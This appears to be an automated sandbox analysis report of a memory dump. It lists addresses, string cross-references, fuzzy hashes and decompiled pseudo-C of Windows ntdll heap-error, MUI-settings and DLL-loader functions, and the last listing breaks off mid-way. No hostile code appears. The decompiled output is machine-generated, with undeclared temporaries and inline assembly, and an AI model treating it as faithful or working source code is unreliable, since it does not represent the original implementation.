0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013f1c67
0x013f1cdc
0x013f1ce5
0x013f1d04
0x013f1d05
0x013f1ce7
0x013f1cfc
0x013f1d01
0x013f1d0b
0x013f1d17
0x013f1d1f
0x013f1d25
0x013f1d30
0x013f1d4f
0x013f1d50
0x013f1d32
0x013f1d47
0x013f1d4c
0x013f1d61
0x013f1d67
0x013f1d68
0x013f1d6e
0x013f1d79
0x013f1d98
0x013f1d99
0x013f1d7b
0x013f1d90
0x013f1d95
0x013f1daa
0x013f1db0
0x013f1db1
0x013f1db7
0x013f1dc2
0x013f1de1
0x013f1de2
0x013f1dc4
0x013f1dd9
0x013f1dde
0x013f1df3
0x013f1df9
0x013f1dfa
0x013f1e00
0x013f1e0a
0x013f1e13
0x013f1e32
0x013f1e33
0x013f1e15
0x013f1e2a
0x013f1e2f
0x013f1e39
0x013f1e4a
0x013f1e02
0x013f1e02
0x013f1e08
0x00000000
0x00000000
0x013f1e08
0x013f1e5b
0x013f1e7a
0x013f1e7b
0x013f1e5d
0x013f1e72
0x013f1e77
0x013f1e95

Strings

heap_failure_buffer_underrun, xrefs: 013F1C9F
Heap error detected at %p (heap handle %p), xrefs: 013F1C50
HEAP: , xrefs: 013F1C16, 013F1C3D, 013F1D04, 013F1D4F, 013F1D98, 013F1DE1, 013F1E32, 013F1E7A
Error code: %d - %s, xrefs: 013F1D12
Parameter2: %p, xrefs: 013F1DA5
heap_failure_entry_corruption, xrefs: 013F1C83
Stack trace available at %p, xrefs: 013F1E86
heap_failure_internal, xrefs: 013F1C6E
Last known valid blocks: before - %p, after - %p, xrefs: 013F1E45
heap_failure_invalid_argument, xrefs: 013F1CAD
heap_failure_usage_after_free, xrefs: 013F1CBB
heap_failure_lfh_bitmap_mismatch, xrefs: 013F1CD7
heap_failure_multiple_entries_corruption, xrefs: 013F1C8A
heap_failure_unknown, xrefs: 013F1C75
heap_failure_generic, xrefs: 013F1C7C
Parameter1: %p, xrefs: 013F1D5C
heap_failure_listentry_corruption, xrefs: 013F1CD0
heap_failure_block_not_busy, xrefs: 013F1CA6
Parameter3: %p, xrefs: 013F1DEE
heap_failure_cross_heap_operation, xrefs: 013F1CC2
heap_failure_buffer_overrun, xrefs: 013F1C98
heap_failure_virtual_block_corruption, xrefs: 013F1C91
HEAP[%wZ]: , xrefs: 013F1C30, 013F1CF7, 013F1D42, 013F1D8B, 013F1DD4, 013F1E25, 013F1E6D
heap_failure_invalid_allocation_type, xrefs: 013F1CB4
heap_failure_freelists_corruption, xrefs: 013F1CC9

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 769c93993b756e9217c36a02b9f6a837ea4ff4390e164a5fcd5693edd4a67a5c
Instruction ID: 2101942951451e07607627e5092341f49d1873c2bb907dc73e389ff2a7787d5e
Opcode Fuzzy Hash: 769c93993b756e9217c36a02b9f6a837ea4ff4390e164a5fcd5693edd4a67a5c
Instruction Fuzzy Hash: 4961F437910159DFD621BB89E486E34B3A8EB1493CB49807EF70DAF754D6B498818B0E

Uniqueness

Uniqueness Score: -1.00%

Function 01343D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01343D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01341B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01341B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01341B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01341B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01341B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01354620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0137F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01381370(_t276, 0x1314e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0137BB40(0,  &_v68, _t170);
									if(L013443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0137BB40(_t257,  &_v68, _t243);
								if(L013443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01381370(_t278, 0x1314e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01354620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0137F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01381370(_v16, 0x1314e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0137BB40(_t262,  &_v68, _t244);
								if(L013443C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01381370(_t282, 0x1314e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0137BB40(_t262,  &_v68, _t201);
							if(L013443C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01354620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0137F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01381370(_t280, 0x1314e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0137BB40(_t267,  &_v68, _t245);
							if(L013443C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01381370(_t284, 0x1314e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0137BB40(_t267,  &_v68, _t224);
						if(L013443C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L013577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01343d3c
0x01343d42
0x01343d44
0x01343d46
0x01343d49
0x01343d4c
0x01343d4f
0x01343d52
0x01343d55
0x01343d58
0x01343d5b
0x01343d5f
0x01343d61
0x01343d66
0x01398213
0x01398218
0x01344085
0x01344088
0x0134408e
0x01344094
0x0134409a
0x013440a0
0x013440a6
0x013440a9
0x013440af
0x013440b6
0x013440bd
0x013440bd
0x01343d83
0x0139821f
0x01398229
0x01398238
0x01398238
0x0139823d
0x0139823d
0x01343da0
0x01343daf
0x01343db5
0x01343dba
0x01343dba
0x01343dd4
0x01343e94
0x01343eab
0x01343f6d
0x01343f84
0x0134406b
0x0134406b
0x0134406e
0x0134406e
0x01344070
0x01344074
0x01398351
0x01398351
0x0134407a
0x0134407f
0x0139835d
0x01398370
0x01398377
0x01398379
0x0139837c
0x0139837c
0x0139835d
0x00000000
0x0134407f
0x01343f8a
0x01343f8d
0x01343f90
0x01343f95
0x0139830d
0x0139830f
0x01343f9b
0x01343fac
0x01343fae
0x01343fb1
0x01343fb1
0x01343fb6
0x01398317
0x0139831a
0x00000000
0x01343fbc
0x01343fc1
0x01343fc9
0x01343fd7
0x01343fda
0x01343fdd
0x01344021
0x01344021
0x01344029
0x01344030
0x01344044
0x01344046
0x01344046
0x01344044
0x01344049
0x01398327
0x01398334
0x01398339
0x0139833c
0x0134404f
0x0134404f
0x0134404f
0x01344051
0x01344056
0x01344063
0x01344063
0x01344068
0x00000000
0x01344068
0x01343fdf
0x01343fe2
0x01343fe4
0x01343fe7
0x01343fef
0x01344003
0x01344005
0x01344005
0x0134400c
0x01344013
0x01344016
0x01344017
0x0134401b
0x0134401e
0x00000000
0x0134401e
0x01343fb6
0x01343eb1
0x01343eb4
0x01343eb7
0x01343ebc
0x013982a9
0x013982ab
0x01343ec2
0x01343ed3
0x01343ed5
0x01343ed8
0x01343ed8
0x01343edd
0x013982b3
0x013982b6
0x00000000
0x01343ee3
0x01343ee8
0x01343eed
0x01343ef0
0x01343ef3
0x01343f02
0x01343f05
0x01343f08
0x013982c0
0x013982c3
0x013982c5
0x013982c8
0x013982d0
0x013982e4
0x013982e6
0x013982e6
0x013982ed
0x013982f4
0x013982f7
0x013982f8
0x013982fc
0x013982ff
0x013982ff
0x01343f0e
0x01343f11
0x01343f16
0x01343f1d
0x01343f31
0x01398307
0x01398307
0x01343f31
0x01343f39
0x01343f48
0x01343f4d
0x01343f50
0x01343f50
0x01343f53
0x01343f58
0x01343f65
0x01343f65
0x01343f6a
0x00000000
0x01343f6a
0x01343edd
0x01343dda
0x01343ddd
0x01343de0
0x01343de5
0x01398245
0x01343deb
0x01343df7
0x01343dfc
0x01343dfe
0x01343e01
0x01343e01
0x01343e06
0x0139824d
0x0139824f
0x01398254
0x00000000
0x01343e0c
0x01343e11
0x01343e16
0x01343e19
0x01343e29
0x01343e2c
0x01343e2f
0x0139825c
0x0139825f
0x01398261
0x01398264
0x0139826c
0x01398280
0x01398282
0x01398282
0x01398289
0x01398290
0x01398293
0x01398294
0x01398298
0x0139829b
0x0139829b
0x01343e35
0x01343e38
0x01343e3d
0x01343e44
0x01343e58
0x013982a3
0x013982a3
0x01343e58
0x01343e60
0x01343e6f
0x01343e74
0x01343e77
0x01343e77
0x01343e7a
0x01343e7f
0x01343e8c
0x01343e8c
0x01343e91
0x00000000
0x01343e91

Strings

Kernel-MUI-Number-Allowed, xrefs: 01343D8C
Kernel-MUI-Language-SKU, xrefs: 01343F70
Kernel-MUI-Language-Disallowed, xrefs: 01343E97
Kernel-MUI-Language-Allowed, xrefs: 01343DC0
WindowsExcludedProcs, xrefs: 01343D6F

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 9ce29ceba0e2bd5ed7d64ecbedabf6aa3aadcf85f32547c9e2ec058e6d63aa8e
Instruction ID: cc6acebfe5a13610c0908091d0a8021235d6f6de6ad3381eec9ade73d5822814
Opcode Fuzzy Hash: 9ce29ceba0e2bd5ed7d64ecbedabf6aa3aadcf85f32547c9e2ec058e6d63aa8e
Instruction Fuzzy Hash: DEF13C72D00619EFCF15DF98C980AEEBBF9FF48654F14006AE905A7210D774AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01368E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01368E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x142d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1428464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1425780 & 0x00000003) != 0) {
							E013B5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1425780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0137B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1427984; // 0xed2bf8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1428464; // 0x74790110
					 *0x142b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01369B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1425780 & 0x00000005) != 0) {
						_push(_t49);
						E013B5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01368e0f
0x01368e16
0x01368e19
0x01368e1b
0x01368e21
0x01368e7f
0x01368e85
0x013a9354
0x013a936c
0x013a9371
0x013a937b
0x013a9381
0x013a9381
0x013a937b
0x01368e9d
0x01368e9d
0x01368e29
0x01368e2c
0x01368e38
0x01368e3e
0x01368e43
0x01368eb5
0x01368eb9
0x013a92aa
0x013a92af
0x013a92e8
0x013a92e8
0x013a92af
0x01368eb9
0x01368e45
0x01368e53
0x01368e5b
0x01368e5f
0x01368e78
0x01368e78
0x01368e7d
0x01368ec3
0x01368ecd
0x01368ed2
0x01368ed2
0x01368ec5
0x01368ec5
0x00000000
0x01368e7d
0x01368e67
0x01368ea4
0x013a931a
0x00000000
0x00000000
0x013a9320
0x01368ea4
0x01368e70
0x013a9325
0x013a9340
0x013a9345
0x013a9345
0x01368e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 013A9331, 013A935D
minkernel\ntdll\ldrsnap.c, xrefs: 013A933B, 013A9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 013A932A
Querying the active activation context failed with status 0x%08lx, xrefs: 013A9357

Memory Dump Source

Source File: 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, Offset: 01310000, based on PE: true

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e07cc76561bf0fc9f54228a48d952f0cfa3db71afb74eeeac68b792ff8b168e2
Instruction ID: 359ce0cd667a6062af4269442b720fc364d70cfd81377adeaa8494a5008bda0c
Opcode Fuzzy Hash: e07cc76561bf0fc9f54228a48d952f0cfa3db71afb74eeeac68b792ff8b168e2
Instruction Fuzzy Hash: B0410432A403159FEB36AF1C8C8DA75BABCAB0924CF45C1A9E90C57559E7709CC0C791

Uniqueness

Uniqueness Score: -1.00%

Function 01348794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01348794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0134934A() != 0) {
								_t159 = E013BA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1425780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E013B5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1425780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0134849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01348999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01348999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1425c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1425c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01352280(_t92, 0x14286cc);
															_t94 = E01409DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E013661A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1425c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01348A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1425c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1425c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0137F380(_t136, 0x1311184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01352280(_t108, 0x14286cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E013661A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01409D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0134FFB0(_t118, _t156, 0x14286cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01379A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01348799
0x0134879d
0x013487a1
0x013487a3
0x013487a8
0x013487c3
0x013487c3
0x013487c8
0x013487d1
0x013487d4
0x013487d8
0x013487e5
0x013487ec
0x01399bfe
0x01399c00
0x01399c02
0x01399c08
0x01399c0d
0x01399c0f
0x01399c14
0x01399c2d
0x01399c32
0x01399c37
0x01399c3a
0x01399c3c
0x01399c42
0x01399c42
0x01399c3c
0x01399c02
0x013487da
0x013487df
0x013487e3
0x00000000
0x00000000
0x013487e3
0x013487f2
0x00000000
0x013487fb
0x013487fd
0x013487fe
0x0134880e
0x0134880f
0x01348810
0x01348814
0x0134881a
0x0134881c
0x0134881f
0x01348821
0x01348822
0x01348824
0x01348826
0x0134882c
0x0134882e
0x01399c48
0x01399c48
0x01348834
0x01348834
0x01348837
0x00000000
0x00000000
0x01348837
0x0134882e
0x0134883d
0x01348840
0x01348843
0x01348846
0x01348849
0x0134884c
0x0134884e
0x01348850
0x01348852
0x01348854
0x01348857
0x013488b4
0x013488b6
0x013488b6
0x01348859
0x01348859
0x01348859
0x01348861
0x01348866
0x0134886a
0x0134893d
0x01348941
0x00000000
0x01348947
0x01348947
0x0134894a
0x0134894c
0x00000000
0x01348952
0x01348955
0x0134895a
0x0134895d
0x0134895d
0x0134895f
0x01348961
0x01348961
0x01348968
0x00000000
0x00000000
0x0134896a
